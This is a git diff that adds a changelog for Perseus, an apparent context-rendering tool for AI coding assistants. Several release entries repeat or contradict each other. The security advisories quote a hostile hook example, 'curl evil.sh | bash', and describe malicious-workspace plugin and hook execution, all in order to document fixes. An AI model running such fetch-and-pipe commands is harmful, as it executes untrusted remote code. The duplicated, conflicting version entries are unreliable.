diff --git a/CHANGELOG.md b/CHANGELOG.md
index 7e85997..d79f590 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,3 +1,1243 @@
+# Changelog
+
+All notable changes to Perseus.
+
+This project follows the alpha-then-semver convention:
+during the alpha (pre-`1.0.0`) phase, minor bumps may include breaking changes
+that are documented in the release notes.
+
+Each entry maps a release to the task IDs that shipped in it. The
+single-file `perseus.py` runtime is the only required artifact; everything
+else (installer, docs) is generated by `scripts/release.sh`.
+
+## [1.0.6] - UNRELEASED
+
+Critical security + correctness hotfix bundle from a staff-engineering code
+review on 2026-06-03. Multiple fixes; no breaking config changes; auto-migration
+where applicable. See GitHub milestone
+[v1.0.6](https://github.com/tcconnally/perseus/milestone/1) for full tracking.
+
+### 🔒 Security
+
+- **#136** - `long_hex_secret` default redaction rule rewritten. The pre-1.0.6
+  rule (`\b[a-fA-F0-9]{40,}\b`) silently destroyed git commit hashes (40 hex),
+  SHA-256 checksums (64 hex), Docker digests, and Atlassian content hashes in
+  `@query`, `@waypoint`, and `@perseus` output. The rule now requires an
+  explicit credential anchor (`secret=`, `token:`, `api_key=`, `Authorization=`,
+  etc.) before redacting hex strings. Real secrets in credential context are
+  still caught; bare hashes survive verbatim. New regression tests in
+  `tests/test_redaction.py`.
+- Internal: redaction rules now support an optional `_anchor_group` field that
+  identifies which capture group holds the secret payload (everything outside
+  the group is preserved). Used by `long_hex_secret`; available for future
+  context-aware rules.
+
+### 🔧 Configuration & Trust Profiles
+
+- **#129** - Trust profile layering made structural. Pre-1.0.6 a workspace
+  config setting both `permissions.profile: balanced` and
+  `render.allow_query_shell: true` silently rendered with shell execution
+  disabled because the profile merge overwrote the user's explicit value.
+  v1.0.6 uses `skip_keys` to guarantee that an explicit user value for any
+  `render.*` boolean security gate always wins over the profile default,
+  regardless of profile or direction. Also covers `allow_agent_shell`,
+  `allow_services_command`, `allow_remote_services_health`, and
+  `allow_outside_workspace`. Audit trail records layering decisions.
+
+### 📦 Migration Notes
+- No config breaking changes.
+- Explicit user values in `render.*` now structurally win over profile defaults.
+- If you had relied on `long_hex_secret` redacting bare hex output, add an
+  explicit user rule under `redaction.patterns`.
+
+### 🔒 Security
+
+- **#169** - Workspace-sourced plugin configuration (`plugins.dir`) is
+  now refused by default. Pre-1.0.6 a workspace `.perseus/config.yaml`
+  setting `plugins.dir: /path/to/attacker/code` caused
+  `_discover_plugins()` to `spec.loader.exec_module(mod)` on every
+  `.py` file in that directory at startup - full Python execution
+  before any directive trust gate, audit, or user prompt.
+  Same attack vector as #168 but with no shell-quoting limits. Attack:
+  git clone a malicious workspace, get pwned.
+
+  Fix: `_discover_plugins` consults
+  `cfg["_provenance"]["plugins_workspace_sourced"]` set by
+  `load_config`. Workspace-sourced plugin config is refused unless BOTH:
+  1. Global `~/.perseus/config.yaml` sets `plugins.allow_workspace_sourced: true`
+  2. Env var `PERSEUS_ALLOW_DANGEROUS=1`
+
+  Refusal emits a `plugins_workspace_refused` audit event with the
+  refused directory path. Global-sourced plugin config is unaffected.
+
+  Regression suite (8 tests): workspace plugin dir refused by default,
+  allowed with full opt-in, refused with only-global, refused with
+  only-env, global plugins always load, audit trail, no false-positive
+  refusal when no plugin config exists, allow-gate helper unit test.
+
+- **#168** - Workspace-sourced shell hooks and Python `hooks.dir` are
+  now refused by default. Pre-1.0.6 a workspace `.perseus/config.yaml`
+  could declare `hooks.on_render_start: ["curl evil.sh | bash"]` and
+  the command would run on the next `perseus render` - no
+  `allow_query_shell`, no `PERSEUS_ALLOW_DANGEROUS`, no audit. Same
+  attack via `hooks.dir: /path/to/attacker/code` (Python top-level
+  code runs at import time). Attack: git clone a malicious workspace,
+  get pwned.
+
+  Fix: `load_config` annotates `cfg["_provenance"]` with which
+  sections came from the workspace source. `hooks.py` refuses
+  workspace-sourced shell hooks and `hooks.dir` Python hooks unless
+  BOTH conditions are met:
+  1. Global `~/.perseus/config.yaml` sets `hooks.allow_workspace_sourced: true`
+  2. Env var `PERSEUS_ALLOW_DANGEROUS=1` is set
+
+  Refusal emits `hooks_workspace_refused` / `hooks_workspace_shell_refused`
+  audit events plus a stderr warning. Global-sourced hooks are
+  unaffected (the user owns global config; trust is implicit).
+
+  Regression suite (10 tests): workspace shell hook refused, allowed
+  with full opt-in, refused with only-global opt-in, refused with
+  only-env opt-in, global hooks always run, provenance tracking, audit
+  trail, Python hooks.dir refused.
+
+Critical security + correctness hotfix bundle. See GitHub milestone
+[v1.0.6](https://github.com/tcconnally/perseus/milestone/1).
+
+### 🔒 Security Hardening
+
+- **#129** - Trust profile / user config layering is now **structurally**
+  guaranteed to honor explicit user overrides, regardless of the textual
+  order in which `_apply_permission_profile` and the user-merge run.
+
+  **Problem (pre-v1.0.6):** the layering precedence rule "user config wins
+  over profile defaults" was correct *as documented* (see `task-45 AC #3`)
+  but depended entirely on `load_config` calling `_apply_permission_profile`
+  BEFORE the user-merge step. Any future refactor that reordered these two
+  calls - or a third caller that invoked the profile-apply directly without
+  knowing the convention - would silently revert a user who set
+  `permissions.profile: balanced` AND `render.allow_query_shell: true` to
+  `allow_query_shell=false`.
+  This is exactly the scenario filed in #129
+  ("balanced profile silently disables `@query` despite explicit override").
+
+  **Fix:**
+  1. `load_config` now pre-scans all sources to collect every
+     `(section, key)` the user has explicitly set, then passes that set
+     to `_apply_permission_profile(..., skip_keys=...)` as the new
+     keyword arg.
+  2. `_apply_permission_profile` skips any key in `skip_keys`,
+     structurally guaranteeing that user values win. The legacy
+     no-skip-keys signature is preserved for backward compatibility.
+  3. `load_config` emits a `config_profile_overridden` audit event
+     enumerating which user-set keys won out over the profile. This
+     makes the layering decision observable and debuggable.
+
+  **Regression test matrix:** 30 parametrized tests covering all 3
+  profiles × all 5 boolean security gates × both override directions,
+  plus 6 explicit tests for direct unit behavior, workspace>global
+  precedence, audit-event observability, and no-noise audit events
+  when only non-profile-managed keys are set.
+
+  No config breaking changes. Behavior is strictly safer.
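The `skip_keys` layering described in the #129 fix can be sketched roughly as follows. This is a minimal illustration, not the code in `perseus.py`: the `PROFILE_DEFAULTS` table, the helper `collect_explicit_keys`, and the simplified signatures are all assumptions made for the example. The sketch deliberately merges user config *before* applying the profile, to show that the result no longer depends on call order.

```python
# Hypothetical profile defaults for one gate; the real table lives in perseus.py.
PROFILE_DEFAULTS = {
    "strict": {("render", "allow_query_shell"): False},
    "balanced": {("render", "allow_query_shell"): False},
    "power-user": {("render", "allow_query_shell"): True},
}


def collect_explicit_keys(sources):
    """Return every (section, key) pair set in any user config source."""
    explicit = set()
    for source in sources:
        for section, values in source.items():
            if isinstance(values, dict):
                explicit.update((section, key) for key in values)
    return explicit


def apply_permission_profile(cfg, profile, skip_keys=frozenset()):
    """Apply profile defaults, never touching keys listed in skip_keys.

    Returns the profile-managed keys where the user value won, which is
    what an audit event could enumerate.
    """
    overridden = []
    for (section, key), default in PROFILE_DEFAULTS[profile].items():
        if (section, key) in skip_keys:
            overridden.append((section, key))
            continue
        cfg.setdefault(section, {})[key] = default
    return overridden


def load_config(global_cfg, workspace_cfg):
    """Merge sources (workspace last, so it wins), then layer the profile."""
    sources = [global_cfg, workspace_cfg]
    cfg = {}
    for source in sources:
        for section, values in source.items():
            cfg.setdefault(section, {}).update(values)
    profile = cfg.get("permissions", {}).get("profile", "balanced")
    skip = collect_explicit_keys(sources)
    overridden = apply_permission_profile(cfg, profile, skip_keys=skip)
    return cfg, overridden
```

With a workspace config that sets both `permissions.profile: balanced` and `render.allow_query_shell: true`, this sketch keeps the explicit `True` and reports the key as overridden; with no explicit value, the profile default applies and the overridden list stays empty.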
+
+### 🐛 Bug Fixes (other v1.0.6 items, tracked in milestone)
+- #128 - Mnēmē narrative MD5→SHA-256 migration (PR #161)
+- #131 - `memory compact` wall-clock deadline (PR #162)
+- #136 - `long_hex_secret` redaction landmine (PR #159)
+- #137 - `@query` audit log secret leak (PR #160)
+- #139 - MCP `_call_tool` subprocess leak (PR #163)
+- #130, #135, #138, #140, #141, #142
+
+---
+
+Critical security + correctness hotfix bundle. See GitHub milestone
+[v1.0.6](https://github.com/tcconnally/perseus/milestone/1).
+
+### 🐛 Bug Fixes
+
+- **#128** - Mnēmē narratives written under pre-1.0.3 (which used an MD5
+  hash for the per-workspace narrative filename) are no longer silently
+  orphaned on upgrade. v1.0.3+ uses SHA-256; previously, `_mneme_path()`
+  unconditionally returned the SHA-256 path and the MD5 file sat untouched
+  on disk while the user saw `> ⚠ No Mnēmē narrative found for this
+  workspace.`.
+  - `_mneme_path()` now performs a one-shot in-place rename: if the
+    SHA-256 path doesn't exist but the legacy MD5 path does, `os.replace`
+    is used to atomically move it. The narrative is preserved verbatim.
+  - If both paths exist (concurrent write race, or operator-staged files),
+    the current SHA-256 file wins and the legacy file is left untouched.
+  - New CLI: **`perseus memory doctor`** - read-only scan of the memory
+    store that classifies files as SHA-256, legacy MD5, orphan, or unknown.
+    Add `--migrate` to rename all legacy files in one pass; add `--json`
+    for machine-readable output. Idempotent.
+  - New helpers: `_workspace_hash_legacy_md5()`, `_mneme_doctor_scan()`,
+    `_mneme_doctor_migrate()` - all importable from `perseus.py` for
+    operators who need to script around them.
+
+### 🔒 Security (other v1.0.6 items, tracked in milestone)
+- #136 - `long_hex_secret` redaction rule corrupted git hashes (PR #159)
+- #137 - `@query` audit log leaked secrets (PR #160)
+- #138, #139, #140, #141, #142
+
+### 🐛 Bug Fixes (other v1.0.6 items)
+- #129, #130, #131, #135
+
+### 📦 Migration Notes
+- **No manual action required for the MD5→SHA-256 migration.** It happens
+  automatically on first access. Operators with many workspaces can opt
+  to run `perseus memory doctor --migrate` once after upgrading to
+  surface and fix every workspace in one pass.
+
+---
+
+## [1.0.5] - 2026-05-26
+
+**Mnēmē v1 - Persistent Memory Backend (upgraded to Mnēmē v2 in 1.0.6):**
+
+> ⚠ The initial `@mneme` directive and memory backend were upgraded in a
+> subsequent release to the native Mnēmē v2 SQLite FTS5 backend. The `@memory`
+> directive now routes exclusively through Mnēmē v2. See §Mnēmē v2 below.
+
+- **task-86** - `@mneme` directive: query persistent memories via the Mnēmē memory backend.
+- **task-87** - `_mneme_recall()` memory client.
+- **task-88** - `@memory` backend routing *(Upgraded - unified under Mnēmē v2.)*
+- **task-89** - `memory.backend` config key *(Upgraded in Mnēmē v2.)*
+- **task-90** - 20 new tests *(Upgraded with the feature.)*
+
+## [1.0.4] - 2026-05-25
+
+**Phase 24 - Extensibility Architecture (Hephaestus):**
+
+- **task-65** - Plugin directive system: auto-discovered Python plugins under `~/.perseus/plugins/`. Each module exports a `REGISTER` dict of `DirectiveSpec` entries. Plugin errors are warnings, not fatal.
+- **task-66** - Directive macros: `@macro name ... @endmacro` blocks in context documents or `.perseus/macros.md`. Pre-processing pass expands invocations before the resolver loop.
+- **task-67** - Render pipeline hooks: lifecycle callbacks (`on_render_start`, `on_directive_resolved`, `on_cache_hit/miss`, `on_render_complete`, `on_directive_error`) via shell commands or Python callbacks.
+- **task-68** - Output format adapters: plugin interface for custom formats beyond markdown/HTML. `perseus render --format json` returns structured `{resolved, directives}` output.
+- **task-69** - Foreign resolver protocol: `@perseus ` fetches rendered context from remote Perseus serve instances. HMAC signature verification, TTL caching, graceful degradation.
+- **task-70** - Custom schema validators: plugin validators in `.perseus/schemas/`. Referenced via `schema="plugin:my-validator"`. Works alongside the built-in validator.
+- **task-71** - Pipe syntax: lightweight chaining - `@query "ls" | @cache ttl=300`. Left-to-right resolution, output of stage N becomes input of stage N+1.
+- **task-72** - Event webhooks: POST render lifecycle events to external URLs with optional HMAC-SHA256 signing.
+  Config-driven with per-event selection.
+- **task-73** - Tool directive integration: `@tool "path/to/tool"` with config-based allowlist, argument restrictions, timeouts, and output size caps.
+- **task-74** - Directive aliasing: config-driven shorthand - `@q→@query`, `@svc→@services`. Single-pass expansion, built-ins always win collisions.
+
+**Phase 25 - MCP Deep Integration:**
+
+- **task-75** - Expose every directive as an MCP tool. `perseus mcp serve` runs a JSON-RPC 2.0 MCP server over stdio. Each `DIRECTIVE_REGISTRY` entry becomes a `perseus_` tool with auto-generated descriptions and input schemas. Trust gates enforced per-tool. Backward compatible with existing `perseus_get_context` / `perseus_get_health`.
+
+## [1.0.3] - 2026-05-24
+
+**Phase 24 - Assistant format targets, hook installer, MCP server (~840 lines):**
+
+- **task-77** - Assistant format targets: `perseus render --format agents-md|claude-md|cursorrules|copilot-instructions`
+  renders `.perseus/context.md` into every major assistant's native context file. Auto-resolves
+  default output paths. Each file gets a "Generated by Perseus" header pointing back to the source.
+- **task-78** - Hook installer: `perseus install --target claude-code` drops SessionStart + UserPromptSubmit
+  hooks into `.claude/settings.json` for automatic context injection at session start and on every
+  prompt. Also supports `--target cursor`, `gemini-cli`, `copilot`. Smart merge preserves existing hooks.
+- **task-79** - MCP server façade: `perseus mcp serve` runs as a JSON-RPC 2.0 MCP server over stdio, exposing
+  13 Perseus directives as native MCP tools (query, services, memory, skills, waypoint, session,
+  agora, inbox, read, env, health, agent, date). `mcp config` prints ready-to-paste client configs.
+
+**Distribution:**
+
+- **task-80** - MCP Registry listing published live (`server.json`) - 13 tools, PyPI transport.
+- **task-81** - Anthropic Skills marketplace listing (`SKILL.md`) - ready for PR to `anthropics/skills`.
+- `pyproject.toml` version bumped to 1.0.3.
+
+**Show HN preparation:**
+
+- **task-82** - Swarm demo script - 120 agents, 4 batches, 51 frames of parallel multi-agent coordination.
+- **task-83** - Swarm demo GIF re-themed to match perseus.observer palette; added to README Multi-Agent section.
+- **task-84** - Show HN post draft.
+- **task-85** - Cyberpunk v2 landing page deployed to perseus.observer.
+
+**CI, docs, and tooling:**
+
+- GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12.
+- `.coveragerc` - 70% coverage threshold.
+- 596 tests passing, 1 skipped.
+
+## [1.0.2] - 2026-05-23
+
+**Bug fixes (Opus 4.7 Max / Codex 5.5 Extreme High benchmarks):**
+
+- **task-63** - Fixed `Path.write_text` missing encoding on Windows - emoji (📌) crash in default prompts.
+- **task-64** - Fixed `/bin/bash` unreachable on native Windows Python - added `_get_shell()` helper
+  using `shutil.which()` with system-default fallback for `@query`, `@services`, and `@agent`.
+- **task-65** - Fixed `@query` binary stdout NoneType crash - guarded `result.stdout` with `or ""`.
+- **task-66** - Fixed `perseus --help` crash on Windows (Mnēmē macron `ē` can't encode to `cp1252`) -
+  added `sys.stdout/stderr.reconfigure(encoding="utf-8")` at import time.
+
+**New features:**
+
+- **task-67** - **`render.max_query_bytes`** (default 256 KB) - caps runaway `@query` stdout with a
+  visible truncation marker. Prevents 12 MB scanner output from silently inflating
+  context documents (47× output reduction demonstrated).
+- **task-68** - **Configurable `@query` timeout** - `render.query_timeout_s` (default 30s) and per-directive
+  `timeout=N` modifier (e.g. `@query "..." timeout=120`).
+- **task-69** - **`render.parallel_services`** (opt-in, default off) - concurrent `@services` health checks
+  via `ThreadPoolExecutor`. 100 services go from ~5 min serial to ~3 s parallel.
+- **task-70** - **`render.parallel_queries`** (opt-in, default off) - pre-scans top-level `@query` directives
+  and resolves them concurrently. Directives inside `@if` branches remain sequential.
+
+**Integrations:**
+
+- **task-71** - **VS Code / Cursor extension** - auto-renders on `.perseus/context.md` save, status bar
+  indicator, auto-detects target assistant file, watch mode.
+- **task-72** - **Claude Code session hook** - one `curl` install, runs `perseus render` before every
+  Claude Code session.
+- **task-73** - **GitHub Action** - renders context on push/schedule, commits back to repo so every
+  developer gets pre-resolved context without installing Perseus locally.
+
+**Multi-agent coordination:**
+
+- **task-74** - **Shared checkpoint store** - agents across machines/sessions share a single checkpoint
+  store (config: `checkpoints.store` path, accessible via NFS/SMB/unison).
+- **task-75** - **Lock file mechanism** - `os.O_CREAT | os.O_EXCL` atomic lock in the checkpoint
+  store prevents concurrent writers from clobbering. Retries with backoff for ~11s before failing
+  gracefully. NFS-safe (O_CREAT | O_EXCL is atomic cross-filesystem).
+- **task-76** - **Checkpoint recovery** - `perseus recover --from ` reads the latest checkpoint
+  and prints the workspace/task/status triplet so an agent dropped into a terminal knows exactly
+  where to resume.
+
+**Benchmarks:**
+
+- Extreme scaling sweep on Linux: 10 → 10,000 `@query` directives, 4 modes each
+  (sequential, cached, parallel, cached+parallel). Cache warm time stays flat at
+  ~0.3–0.5s regardless of scale. 10,000 queries at 0.52s warm (25× vs 13.1s cold).
+- Integrated heavy benchmark suite (`benchmark/heavy/`) with 4 reports, setup harnesses,
+  machine-readable result JSONs from Claude Code Opus 4.7 and Codex 5.5 Extreme High runs.
+- Efficiency infographic on README showing cold→warm scaling curve and 40× warm speedup.
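For the task-75 lock file entry in this release, the `os.O_CREAT | os.O_EXCL` pattern might look something like the sketch below. The function names, the retry count, and the backoff schedule are illustrative assumptions, not the values Perseus uses; only the exclusive-create flag combination comes from the entry itself.

```python
import os
import time


def acquire_lock(lock_path, attempts=8, base_delay_s=0.05):
    """Try to create lock_path exclusively, backing off between attempts.

    Returns True when the lock was taken, False when every attempt failed.
    The attempt count and delays are illustrative, not Perseus defaults.
    """
    for attempt in range(attempts):
        try:
            # O_CREAT | O_EXCL raises FileExistsError if the file already
            # exists, so only one writer can succeed in creating it.
            fd = os.open(lock_path, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
        except FileExistsError:
            time.sleep(base_delay_s * (2 ** attempt))  # exponential backoff
            continue
        with os.fdopen(fd, "w") as handle:
            handle.write(str(os.getpid()))  # record the owner for debugging
        return True
    return False


def release_lock(lock_path):
    """Remove the lock file; a missing file is not treated as an error."""
    try:
        os.remove(lock_path)
    except FileNotFoundError:
        pass
```

A caller would wrap the checkpoint write in `acquire_lock(...)` and `release_lock(...)`, and treat a `False` return as the "fail gracefully" path.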
+
+**CI, docs, and tooling:**
+
+- Added GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12.
+- Added `.coveragerc` - 70% coverage threshold.
+- Updated `.gitignore` for generated context files (CLAUDE.md, AGENTS.md, .cursorrules).
+- Updated demo GIF with 6-scene cold→warm walkthrough.
+- 540 tests passing, 1 skipped. 70% coverage on the 10,463-line artifact.
+
+## [1.0.1] - 2026-05-21
+
+Patch release: corrects the PyPI author field to the GitHub handle (`tcconnally`).
+No code changes; all 496 tests pass.
+
+- **task-62** (follow-up) - post-release doc and metadata fixes: corrected PyPI author
+  field, updated test-count references across README/docs/index.md to reflect live count
+  (496 passed, 1 skipped), and aligned PRODUCT_CONTRACT.md status to v1.0.1 stable.
+
+## [1.0.0] - 2026-05-20
+
+All Phase 1–22 tasks complete. Perseus v1.0.0 - the first stable release.
+
+- **task-56** - Phase 20C: added headless watch mode (`perseus watch`) - inotify/polling
+  file watcher with configurable interval, re-render on change, and debounce. Degrades
+  gracefully when watchdog is unavailable.
+- **task-57** - Phase 21A: added golden evaluation corpus under `tests/fixtures/golden/`
+  covering render, synthesis, and Pythia output shapes; deterministic comparison harness
+  in `tests/test_golden.py`.
+- **task-58** - Phase 21B: added performance budget framework (`tests/test_perf_budgets.py`)
+  with per-command cold/warm timing, advisory warnings at 2× budget, and configurable
+  thresholds. Three commands (render, graph, prefetch) emit advisory warnings in the
+  current environment - not failures.
+- **task-59** - Phase 21C: added compatibility and migration suite (`tests/test_compat_migration.py`)
+  covering checkpoint round-trip compatibility, config migration (`oracle:` → `pythia:` rename),
+  pack manifest version handling, and install/upgrade smoke paths.
+- **task-60** - Phase 22A: added `docs/index.md` (documentation hub), `docs/quickstart.md`
+  (install-to-render in 10 steps), and `docs/CONTRIBUTING.md` (contributor guide with
+  single-file constraint, directive authoring 4-touch pattern, test conventions, Agora
+  workflow). Updated README with `## Documentation` section.
+- **task-61** - Phase 22B: added `examples/` with three runnable demo workspaces:
+  `local-cli/` (render, checkpoint, recover, suggest, doctor), `assistant-profile/`
+  (context pack, hermes profile, @memory + @agora), and `container/README.md` (Docker
+  mount and auth guide). Smoke scripts verified end-to-end.
+- **task-62** - Phase 22C: v1 release candidate checklist. 493 tests passing (1 skipped
+  TCP smoke). Release artifacts built and checksums verified. README/CHANGELOG/ROADMAP
+  docs aligned. Version bumped to `1.0.0-rc.1`. Known limitations documented.
+
+## [1.0.0-rc.1] - 2026-05-20
+
+Release candidate - superseded by v1.0.0.
+
+- **task-63** - Completed the Oracle → Pythia internal rename while preserving the
+  public `perseus oracle` CLI compatibility surface. Added legacy `oracle:`
+  config warnings and one-time `oracle_log.jsonl` → `pythia_log.jsonl`
+  migration.
+- **task-49** - Phase 18B: added `tests/test_release.py` (16 tests) covering all
+  release artifact acceptance criteria - version coherence, repeatability,
+  SHA256SUMS integrity, CHANGELOG task mapping, and tarball contents.
+- **task-50** - Phase 18C: aligned scheduler behavior and docs around
+  host-neutral POSIX crontab generation, macOS launchd, Linux systemd, and
+  explicitly deferred native Windows Task Scheduler support. Added scheduler
+  smoke tests and repaired release artifact portability on macOS/BSD tar.
+- **task-51** - Phase 19A: added offline adapter conformance fixtures and a
+  parametrized harness covering generic, Hermes, Codex, Claude Code, Cursor,
+  and Rovo Dev render outputs, pack manifests, and integration docs.
+- **task-52** - Phase 19B: promoted product profiles into a documented gallery
+  with output paths, trust defaults, refresh guidance, non-interactive generation
+  tests, and hardcoded-path guards for all six supported profiles.
+- **task-53** - Phase 19C: polished the VSCode extension for release with
+  reproducible packaging docs, package scripts, LSP render/checkpoint/mutation
+  smoke tests, and static package-manifest checks.
+- **task-54** - Phase 20A: added optional bearer-token authentication for
+  `perseus serve`, a token generator, non-loopback bind safety gates, trust
+  report serve fields, and HTTP auth tests.
+- **task-55** - Phase 20B: added a single-file-runtime container image,
+  compose examples for render and authenticated serve, container trust docs,
+  and static/optional Docker smoke tests.
+- **task-56** - Phase 20C: added `perseus watch`, a dependency-free polling
+  loop for refreshing single source files or context-pack render targets, with
+  deterministic debounce tests and clean shutdown behavior.
+
+## [0.9.0] - 2026-05-19
+
+### Trust, privacy, and local policy (Phase 17)
+
+- **task-45** - Permission profiles (`strict` / `balanced` / `power-user`); `perseus trust` and `--json`; `serve.bind` promoted to config; version bump to 0.9.0.
+- **task-46** - Secrets redaction (`DEFAULT_REDACTION_RULES`, `redact_text()`) at render/synthesize/serve trust boundaries; source files never mutated; counts-only report.
+- **task-47** - Audit log (`audit_event()` JSONL with rotation); emitters at 5 trust boundaries; `perseus trust audit [--tail N] [--json]`; default `perseus trust` shows audit posture; secret values never persisted.
+
+### Distribution (Phase 18)
+
+- **task-48** - Installer bootstrap (`scripts/install.sh` + `INSTALL.md`); preserves the single-file runtime; verifies Python 3.10+ and `pyyaml`; idempotent upgrade and clean uninstall.
+- **task-49** - Release artifacts and versioning: `VERSION` file as source of truth, `scripts/release.sh` produces a deterministic tarball + zip + SHA256SUMS, this changelog, and version-coherence checks (perseus.py / VERSION / CHANGELOG).
+
+### Verification
+
+- Tests: 393 passing, 0 skipped.
+- Single-file runtime: `perseus.py` (`pyyaml` only).
+
+## [0.8.x and earlier]
+
+Pre-Phase 17 history is tracked in `tasks/` (closed task files) and `HANDOFF.md`.
+
+# Changelog
+
+All notable changes to Perseus.
+
+This project follows the alpha-then-semver convention:
+during the alpha (pre-`1.0.0`) phase, minor bumps may include breaking changes
+that are documented in the release notes.
+
+Each entry maps a release to the task IDs that shipped in it. The
+single-file `perseus.py` runtime is the only required artifact; everything
+else (installer, docs) is generated by `scripts/release.sh`.
+
+## [1.0.6] - UNRELEASED
+
+Critical security + correctness hotfix bundle. See GitHub milestone
+[v1.0.6](https://github.com/tcconnally/perseus/milestone/1).
+
+### 🐛 Bug Fixes
+
+- **#131** - `perseus memory compact` no longer hangs indefinitely when an
+  LLM provider (e.g. Ollama with a large model) is slow. Pre-1.0.6,
+  `_mneme_compact_llm()` called `run_llm()` which only enforced
+  `llm.timeout_s` (default 30s) on the HTTP request itself.
+  With streaming token providers, individual tokens can arrive within
+  timeout but total wall time was unbounded - operators reported
+  `memory compact` hanging for hours.
+  - `_memory_do_compact()` now wraps the LLM call in a wall-clock deadline
+    via `ThreadPoolExecutor.future.result(timeout=…)`.
+  - New config knob `memory.compact_total_timeout_s` (default 180s).
+    Set to 0 for pre-1.0.6 behavior (unbounded; not recommended).
+  - On timeout, `_memory_do_compact` falls back to the deterministic
+    narrative builder and writes a clear stderr message:
+    `> ⚠ Mnēmē compact: LLM provider 'ollama' exceeded
+    compact_total_timeout_s=180s; falling back to deterministic narrative.`
+  - New audit event `memory_compact_timeout` records provider, timeout
+    value, and workspace hash for observability.
+  - Same fallback path engages on any LLM exception (provider unreachable,
+    payload error) - `memory compact` always produces a usable narrative.
+  - **Limitation:** ThreadPoolExecutor cannot truly kill the worker
+    thread; the in-flight HTTP request continues until urllib's
+    per-request timeout fires. Worst-case wait is therefore
+    `compact_total_timeout_s + llm.timeout_s`. The leaked thread is
+    daemonized and will not block process exit.
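The wall-clock deadline described in the #131 entry can be sketched along these lines. This is a simplified illustration under stated assumptions, not the body of `_memory_do_compact`: the helper name `call_with_deadline`, its parameters, and the `slow_llm` stand-in are invented for the example. Note also that in recent CPython versions the stock `ThreadPoolExecutor` workers are joined at interpreter exit, so this sketch does not reproduce the daemonized-thread behavior the entry mentions.

```python
import time
from concurrent.futures import ThreadPoolExecutor, TimeoutError as FutureTimeout


def call_with_deadline(fn, total_timeout_s, fallback):
    """Run fn() under a wall-clock deadline; use fallback() on timeout or error.

    A total_timeout_s of 0 disables the deadline (unbounded wait), mirroring
    the documented meaning of the config knob.
    """
    executor = ThreadPoolExecutor(max_workers=1)
    future = executor.submit(fn)
    try:
        timeout = total_timeout_s if total_timeout_s > 0 else None
        return future.result(timeout=timeout)
    except FutureTimeout:
        # Deadline exceeded: the worker keeps running, but we stop waiting.
        return fallback()
    except Exception:
        # Any error raised by fn() takes the same fallback path.
        return fallback()
    finally:
        # Do not block on the worker; it can only be abandoned, not killed.
        executor.shutdown(wait=False)


def slow_llm():
    """Hypothetical stand-in for a slow streaming LLM call."""
    time.sleep(0.5)
    return "llm narrative"
```

Calling `call_with_deadline(slow_llm, 0.05, lambda: "deterministic narrative")` returns the fallback value once the 0.05 s deadline passes, while the abandoned worker finishes in the background.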

### 🔒 Security (other v1.0.6 items, tracked in milestone)
- #136 — `long_hex_secret` redaction rule corrupted git hashes (PR #159)
- #137 — `@query` audit log leaked secrets (PR #160)
- #138, #139, #140, #141, #142

### 🐛 Bug Fixes (other v1.0.6 items)
- #128 — Mnēmē narrative MD5→SHA-256 migration (PR #161)
- #129, #130, #135

### 📦 Migration Notes
- New default `memory.compact_total_timeout_s: 180` is strictly safer
  than pre-1.0.6 behavior. Users who want the old (unbounded) behavior
  can set it to 0.

---

## [1.0.5] — 2026-05-26

**Bastra-Recall — Persistent Memory Backend (superseded by Mnēmē v2 in 1.0.6):**

> ⚠ The `@bastra` directive and `memory.backend = "bastra"` config were removed in a
> subsequent release and replaced by the native Mnēmē v2 SQLite FTS5 backend
> (`@mneme` directive). The `@memory` directive now routes exclusively through
> Mnēmē v2. See §Mnēmē v2 below.

- **task-86** — `@bastra` directive: query persistent memories via the bastra-recall HTTP API.
  *(Removed — use `@mneme` instead.)*
- **task-87** — `_bastra_recall()` HTTP client *(Removed.)*
- **task-88** — `@memory` backend routing *(Removed — unified under Mnēmē v2.)*
- **task-89** — `memory.backend` and `bastra_url` config keys *(Removed.)*
- **task-90** — 20 new tests *(Removed with the feature.)*

## [1.0.4] — 2026-05-25

**Phase 24 — Extensibility Architecture (Hephaestus):**

- **task-65** — Plugin directive system: auto-discovered Python plugins under `~/.perseus/plugins/`. Each module exports a `REGISTER` dict of `DirectiveSpec` entries. Plugin errors are warnings, not fatal.
- **task-66** — Directive macros: `@macro name ... @endmacro` blocks in context documents or `.perseus/macros.md`. Pre-processing pass expands invocations before the resolver loop.
- **task-67** — Render pipeline hooks: lifecycle callbacks (`on_render_start`, `on_directive_resolved`, `on_cache_hit/miss`, `on_render_complete`, `on_directive_error`) via shell commands or Python callbacks.
- **task-68** — Output format adapters: plugin interface for custom formats beyond markdown/HTML. `perseus render --format json` returns structured `{resolved, directives}` output.
- **task-69** — Foreign resolver protocol: `@perseus ` fetches rendered context from remote Perseus serve instances. HMAC signature verification, TTL caching, graceful degradation.
- **task-70** — Custom schema validators: plugin validators in `.perseus/schemas/`. Referenced via `schema="plugin:my-validator"`. Works alongside the built-in validator.
- **task-71** — Pipe syntax: lightweight chaining — `@query "ls" | @cache ttl=300`. Left-to-right resolution, output of stage N becomes input of stage N+1.
- **task-72** — Event webhooks: POST render lifecycle events to external URLs with optional HMAC-SHA256 signing. Config-driven with per-event selection.
- **task-73** — Tool directive integration: `@tool "path/to/tool"` with config-based allowlist, argument restrictions, timeouts, and output size caps.
- **task-74** — Directive aliasing: config-driven shorthand — `@q→@query`, `@svc→@services`. Single-pass expansion, built-ins always win collisions.

**Phase 25 — MCP Deep Integration:**

- **task-75** — Expose every directive as an MCP tool. `perseus mcp serve` runs a JSON-RPC 2.0 MCP server over stdio. Each `DIRECTIVE_REGISTRY` entry becomes a `perseus_` tool with auto-generated descriptions and input schemas. Trust gates enforced per-tool. Backward compatible with existing `perseus_get_context` / `perseus_get_health`.

## [1.0.3] — 2026-05-24

**Phase 24 — Assistant format targets, hook installer, MCP server (~840 lines):**

- **task-77** — Assistant format targets: `perseus render --format agents-md|claude-md|cursorrules|copilot-instructions`
  renders `.perseus/context.md` into every major assistant's native context file. Auto-resolves
  default output paths. Each file gets a "Generated by Perseus" header pointing back to the source.
- **task-78** — Hook installer: `perseus install --target claude-code` drops SessionStart + UserPromptSubmit
  hooks into `.claude/settings.json` for automatic context injection at session start and on every
  prompt. Also supports `--target cursor`, `gemini-cli`, `copilot`. Smart merge preserves existing hooks.
- **task-79** — MCP server façade: `perseus mcp serve` runs as a JSON-RPC 2.0 MCP server over stdio, exposing
